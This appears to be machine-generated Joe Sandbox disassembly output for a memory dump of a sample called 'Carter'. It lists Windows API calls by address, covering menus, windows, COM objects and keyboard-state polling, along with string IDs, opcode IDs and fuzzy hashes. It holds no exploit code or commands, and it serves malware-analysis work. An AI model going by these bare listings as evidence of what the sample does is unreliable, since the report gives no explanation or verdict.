                                                                            • Instruction Fuzzy Hash: E402BD34129341DFC724EF24C991AAFBBE5AF95344F10491EF499932A2DB30DA69CF42
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: __i64tow__itow__swprintf
                                                                            • String ID: %.15g$0x%p$False$True
                                                                            • API String ID: 421087845-2263619337
                                                                            • Opcode ID: 5e53e0de58b16dacf075be7888e60881af6de9427f2971353563f19f8221f4ec
                                                                            • Instruction ID: 92ce35b23658696bd154be38f795e1155bf3dce968aea6addac7b6038441b385
                                                                            • Opcode Fuzzy Hash: 5e53e0de58b16dacf075be7888e60881af6de9427f2971353563f19f8221f4ec
                                                                            • Instruction Fuzzy Hash: 8841C57163420AAFDB34EF64D842E79B3E8EB45300F20446AE58ED7692EB719961CB11
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002F778F
                                                                            • CreateMenu.USER32 ref: 002F77AA
                                                                            • SetMenu.USER32(?,00000000), ref: 002F77B9
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002F7846
                                                                            • IsMenu.USER32(?), ref: 002F785C
                                                                            • CreatePopupMenu.USER32 ref: 002F7866
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002F7893
                                                                            • DrawMenuBar.USER32 ref: 002F789B
                                                                            Similarity
                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                            • String ID: 0$F
                                                                            • API String ID: 176399719-3044882817
                                                                            • Opcode ID: 873879fd1ebfd9b3eddb532ea405523224e2583624756f61d7ec1ffd597774dd
                                                                            • Instruction ID: 0d2dac71b2f71e58881211ec1d77a7f085420441d58f2deb6efdf3befaa71452
                                                                            • Opcode Fuzzy Hash: 873879fd1ebfd9b3eddb532ea405523224e2583624756f61d7ec1ffd597774dd
                                                                            • Instruction Fuzzy Hash: 24415C74A15209EFEB21DF64D888BAABBF9FF49390F144029FA45A7350D730A920DF50
                                                                            APIs
                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002F7B83
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 002F7B8A
                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002F7B9D
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 002F7BA5
                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 002F7BB0
                                                                            • DeleteDC.GDI32(00000000), ref: 002F7BB9
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 002F7BC3
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002F7BD7
                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002F7BE3
                                                                            Similarity
                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                            • String ID: static
                                                                            • API String ID: 2559357485-2160076837
                                                                            • Opcode ID: 9f7d4a47c9758c40b98c6be530f6ae522cda585561fc19ea877efdb7bc691cd2
                                                                            • Instruction ID: d46ad9f2d4dfa785e634711a510fe4bace08d592380ce3404118017b32a76e89
                                                                            • Opcode Fuzzy Hash: 9f7d4a47c9758c40b98c6be530f6ae522cda585561fc19ea877efdb7bc691cd2
                                                                            • Instruction Fuzzy Hash: 0F319E32115219AFDF169F64DC49FEB7B6DFF0A364F110225FA19A21A0CB71D820DBA4
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 0029706B
                                                                              • Part of subcall function 00298D58: __getptd_noexit.LIBCMT ref: 00298D58
                                                                            • __gmtime64_s.LIBCMT ref: 00297104
                                                                            • __gmtime64_s.LIBCMT ref: 0029713A
                                                                            • __gmtime64_s.LIBCMT ref: 00297157
                                                                            • __allrem.LIBCMT ref: 002971AD
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002971C9
                                                                            • __allrem.LIBCMT ref: 002971E0
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002971FE
                                                                            • __allrem.LIBCMT ref: 00297215
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00297233
                                                                            • __invoke_watson.LIBCMT ref: 002972A4
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                            • String ID:
                                                                            • API String ID: 384356119-0
                                                                            • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                            • Instruction ID: b6471888835ad3754bdc48ec8568f8833c084c776775e407f3fd4779bbcc5369
                                                                            • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                            • Instruction Fuzzy Hash: 7B71D871E34717ABDB14DF79CC41B5AB3A9AF51320F14423AF914D7681EB70D9608B90
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 002D2CE9
                                                                            • GetMenuItemInfoW.USER32(00337890,000000FF,00000000,00000030), ref: 002D2D4A
                                                                            • SetMenuItemInfoW.USER32(00337890,00000004,00000000,00000030), ref: 002D2D80
                                                                            • Sleep.KERNEL32(000001F4), ref: 002D2D92
                                                                            • GetMenuItemCount.USER32(?), ref: 002D2DD6
                                                                            • GetMenuItemID.USER32(?,00000000), ref: 002D2DF2
                                                                            • GetMenuItemID.USER32(?,-00000001), ref: 002D2E1C
                                                                            • GetMenuItemID.USER32(?,?), ref: 002D2E61
                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002D2EA7
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D2EBB
                                                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D2EDC
                                                                            Similarity
                                                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                            • String ID:
                                                                            • API String ID: 4176008265-0
                                                                            • Opcode ID: a8d20859bc6fe3f42c1c2cf92b4eef6ffa5bb30723f09519eb51e0d1c8133647
                                                                            • Instruction ID: 953d758747608d140ecfe43f45eab217b1d6d6ae5198f536851212fd4cf53e93
                                                                            • Opcode Fuzzy Hash: a8d20859bc6fe3f42c1c2cf92b4eef6ffa5bb30723f09519eb51e0d1c8133647
                                                                            • Instruction Fuzzy Hash: C561ADB092024AEFDB25CF64CD88ABEBBB9EB51304F14045BF851A7351D731AD29DB21
                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002F75CA
                                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002F75CD
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 002F75F1
                                                                            • _memset.LIBCMT ref: 002F7602
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002F7614
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002F768C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 830647256-0
                                                                            • Opcode ID: d835c3d67d47890dfa54c60942ba3964edd0643de435c1a961ad75596138e6dd
                                                                            • Instruction ID: 085bf72528f888507d3bdfba8996992cc62253925b81a6c438b1e9998e6eae5d
                                                                            • Opcode Fuzzy Hash: d835c3d67d47890dfa54c60942ba3964edd0643de435c1a961ad75596138e6dd
                                                                            • Instruction Fuzzy Hash: 05617975914208AFDB21DFA4CC85EFEB7B8EB09750F1001A9FA15AB2A1C770AD51DF60
                                                                            APIs
                                                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 002C77DD
                                                                            • SafeArrayAllocData.OLEAUT32(?), ref: 002C7836
                                                                            • VariantInit.OLEAUT32(?), ref: 002C7848
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 002C7868
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 002C78BB
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 002C78CF
                                                                            • VariantClear.OLEAUT32(?), ref: 002C78E4
                                                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 002C78F1
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002C78FA
                                                                            • VariantClear.OLEAUT32(?), ref: 002C790C
                                                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002C7917
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                            • String ID:
                                                                            • API String ID: 2706829360-0
                                                                            • Opcode ID: d1dc0f1682f46c1233f44701b54a0a3f5ef8c72c38cbcee1ec6a25b7b43d7bc3
                                                                            • Instruction ID: 319ed73e761fe1e7eaf77d4b56d9d38f9a1c8fe438a7e8fc58a64c5b8def480b
                                                                            • Opcode Fuzzy Hash: d1dc0f1682f46c1233f44701b54a0a3f5ef8c72c38cbcee1ec6a25b7b43d7bc3
                                                                            • Instruction Fuzzy Hash: E4417335A11219DFCF05DFA5CC98EADBBB8FF08300F008169E955A7261CB30AA55CF90
                                                                            APIs
                                                                            • GetKeyboardState.USER32(?), ref: 002D0530
                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 002D05B1
                                                                            • GetKeyState.USER32(000000A0), ref: 002D05CC
                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 002D05E6
                                                                            • GetKeyState.USER32(000000A1), ref: 002D05FB
                                                                            • GetAsyncKeyState.USER32(00000011), ref: 002D0613
                                                                            • GetKeyState.USER32(00000011), ref: 002D0625
                                                                            • GetAsyncKeyState.USER32(00000012), ref: 002D063D
                                                                            • GetKeyState.USER32(00000012), ref: 002D064F
                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 002D0667
                                                                            • GetKeyState.USER32(0000005B), ref: 002D0679
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: 0c3d9697c868449abaf199f158529a8314a7b558da14ff7e27983188f9ca4ad4
                                                                            • Instruction ID: 27c7512c7e63e747a44842f094a12a94f91e56d736083d1cb1e0f8a367243ecb
                                                                            • Opcode Fuzzy Hash: 0c3d9697c868449abaf199f158529a8314a7b558da14ff7e27983188f9ca4ad4
                                                                            • Instruction Fuzzy Hash: 3D41E5209147CB6DFF358E6498943B5BEA46B52300F48404BD9C5473D2EAA49DF88FE2
                                                                            APIs
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • CoInitialize.OLE32 ref: 002E8AED
                                                                            • CoUninitialize.OLE32 ref: 002E8AF8
                                                                            • CoCreateInstance.OLE32(?,00000000,00000017,00303BBC,?), ref: 002E8B58
                                                                            • IIDFromString.OLE32(?,?), ref: 002E8BCB
                                                                            • VariantInit.OLEAUT32(?), ref: 002E8C65
                                                                            • VariantClear.OLEAUT32(?), ref: 002E8CC6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            • API String ID: 834269672-1287834457
                                                                            • Opcode ID: 14a55b946a5d8ad662c2b65385f97d4283eb1e6fd0909a4c497f661f7f32ad70
                                                                            • Instruction ID: baa0ac74ae0c1710d37fd49dd21578a099be1bea1f2dd66aa69a6d4d494c4830
                                                                            • Opcode Fuzzy Hash: 14a55b946a5d8ad662c2b65385f97d4283eb1e6fd0909a4c497f661f7f32ad70
                                                                            • Instruction Fuzzy Hash: 5A61EE702687519FC715DF11C888F6AB7E8AF45708F50484EF9C99B291CB70ED58CBA2
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 002DBB13
                                                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002DBB89
                                                                            • GetLastError.KERNEL32 ref: 002DBB93
                                                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 002DBC00
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: 8062656cec10c288ebf38f078a9d428763b8ba245a63b826ead1815b5d15c334
                                                                            • Instruction ID: 0e632d0651427ea9b12cac79e7e778a180f3c769f892ea1259ab1897b649e7f6
                                                                            • Opcode Fuzzy Hash: 8062656cec10c288ebf38f078a9d428763b8ba245a63b826ead1815b5d15c334
                                                                            • Instruction Fuzzy Hash: F931A235A20209DFCB12EF68C865EA9B7B8EF44304F15806BE805E7395DB709D62CB51
                                                                            APIs
                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 002D357C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: IconLoad
                                                                            • String ID: ,z30z3$,z30z3$blank$info$question$stop$warning
                                                                            • API String ID: 2457776203-888455591
                                                                            • Opcode ID: c4aa16fa5655a56d23752b2dd84bbfc46409b488bc2ddd4a7d1cea8e2c364bd0
                                                                            • Instruction ID: 19a5adaf0078ab296bb9867183b27d71f94c17fca4090149da27f6219f21f3a8
                                                                            • Opcode Fuzzy Hash: c4aa16fa5655a56d23752b2dd84bbfc46409b488bc2ddd4a7d1cea8e2c364bd0
                                                                            • Instruction Fuzzy Hash: D4112B7162C357BEEB05CE14FC92DAA779CDF0D760B50001BF50466381E7A47F604AA2
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002CB7BD
                                                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002C9BCC
                                                                            • GetDlgCtrlID.USER32 ref: 002C9BD7
                                                                            • GetParent.USER32 ref: 002C9BF3
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 002C9BF6
                                                                            • GetDlgCtrlID.USER32(?), ref: 002C9BFF
                                                                            • GetParent.USER32(?), ref: 002C9C1B
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 002C9C1E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: b166a84310746a7216df8ec5b1f9b619260bf74eb14f5b1e545e28a49ea7e23b
                                                                            • Instruction ID: 9fee72b708ed540c6a0b7940de023a85047c3c12b7e9c0fb37d4f5afc4362446
                                                                            • Opcode Fuzzy Hash: b166a84310746a7216df8ec5b1f9b619260bf74eb14f5b1e545e28a49ea7e23b
                                                                            • Instruction Fuzzy Hash: 7C21E074911108BBCF05EB60DC99EFEBBA9EF99300F10021AF861932D1DB754939DB20
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 002CB7BD
                                                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 002C9CB5
                                                                            • GetDlgCtrlID.USER32 ref: 002C9CC0
                                                                            • GetParent.USER32 ref: 002C9CDC
                                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 002C9CDF
                                                                            • GetDlgCtrlID.USER32(?), ref: 002C9CE8
                                                                            • GetParent.USER32(?), ref: 002C9D04
                                                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 002C9D07
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 1536045017-1403004172
                                                                            • Opcode ID: 2db9bdd90bc2bd8b3fb303c7a15b9e6009d6917477bbfbcbc010349067c67735
                                                                            • Instruction ID: 6228863cb219373b4c98497259760b45e47a9ed89bc7ea6263b751c464fd80b0
                                                                            • Opcode Fuzzy Hash: 2db9bdd90bc2bd8b3fb303c7a15b9e6009d6917477bbfbcbc010349067c67735
                                                                            • Instruction Fuzzy Hash: C721B075911108ABDF05AB60CC95FFEBBA9EF99300F100216F95193191DB754979DF20
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(?), ref: 002E8FC1
                                                                            • CoInitialize.OLE32(00000000), ref: 002E8FEE
                                                                            • CoUninitialize.OLE32 ref: 002E8FF8
                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 002E90F8
                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 002E9225
                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00303BDC), ref: 002E9259
                                                                            • CoGetObject.OLE32(?,00000000,00303BDC,?), ref: 002E927C
                                                                            • SetErrorMode.KERNEL32(00000000), ref: 002E928F
                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002E930F
                                                                            • VariantClear.OLEAUT32(?), ref: 002E931F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                            • String ID:
                                                                            • API String ID: 2395222682-0
                                                                            • Opcode ID: 1a7bbf174f160baacbef662a3c318dc80ed56ad8b47e2ae55d317adacc4fa02a
                                                                            • Instruction ID: e79edffa60163a0268893634ce7d29447a12ad3285685af6459de3819cf29688
                                                                            • Opcode Fuzzy Hash: 1a7bbf174f160baacbef662a3c318dc80ed56ad8b47e2ae55d317adacc4fa02a
                                                                            • Instruction Fuzzy Hash: 0FC15571218345AFD700DF6AC884A2BB7E9FF89308F40491EF98A9B251DB71ED45CB52
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 002D19EF
                                                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1A03
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 002D1A0A
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1A19
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 002D1A2B
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1A44
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1A56
                                                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1A9B
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1AB0
                                                                            • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,002D0A67,?,00000001), ref: 002D1ABB
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                            • String ID:
                                                                            • API String ID: 2156557900-0
                                                                            • Opcode ID: 40577f69a358a6b42cd6a14be8bc0c1fe87ca7f32cb0a0b7e51168d4553002a7
                                                                            • Instruction ID: 9c3838b21274e3c1da1766b61921036d2e758d28621e7ddab63943ed995e6ffe
                                                                            • Opcode Fuzzy Hash: 40577f69a358a6b42cd6a14be8bc0c1fe87ca7f32cb0a0b7e51168d4553002a7
                                                                            • Instruction Fuzzy Hash: 4531D0B1622309BFEB16DF14ED88FA977AEEB54315F104117F800C6690DBB89D60CB60
                                                                            APIs
                                                                            • GetSysColor.USER32(00000008), ref: 0027260D
                                                                            • SetTextColor.GDI32(?,000000FF), ref: 00272617
                                                                            • SetBkMode.GDI32(?,00000001), ref: 0027262C
                                                                            • GetStockObject.GDI32(00000005), ref: 00272634
                                                                            • GetClientRect.USER32(?), ref: 002AC0FC
                                                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 002AC113
                                                                            • GetWindowDC.USER32(?), ref: 002AC11F
                                                                            • GetPixel.GDI32(00000000,?,?), ref: 002AC12E
                                                                            • ReleaseDC.USER32(?,00000000), ref: 002AC140
                                                                            • GetSysColor.USER32(00000005), ref: 002AC15E
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                            • String ID:
                                                                            • API String ID: 3430376129-0
                                                                            • Opcode ID: 370d35e793cc0bc7c5d3865836b8da453953155f93b85d93f83edbb93c1b5ce4
                                                                            • Instruction ID: d25ad88460e58d48f7da664e132313a524eaa0278c082857a8ba4cb9e8132bb0
                                                                            • Opcode Fuzzy Hash: 370d35e793cc0bc7c5d3865836b8da453953155f93b85d93f83edbb93c1b5ce4
